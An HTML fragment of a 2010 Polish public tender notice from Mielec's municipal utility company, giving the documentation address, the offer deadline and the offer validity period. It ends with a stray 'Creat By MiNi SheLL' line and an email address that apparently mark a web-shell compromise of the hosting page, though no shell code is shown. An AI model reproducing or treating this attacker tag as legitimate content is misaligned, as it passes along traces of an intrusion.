<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.mpgk.mielec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o., ul. Wolności 44, 39-300 Mielec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.07.2010 godzina 11:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Komunalnej Spółka z o.o., ul. Wolności 44, 39-300 Mielec, pokój nr 206 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com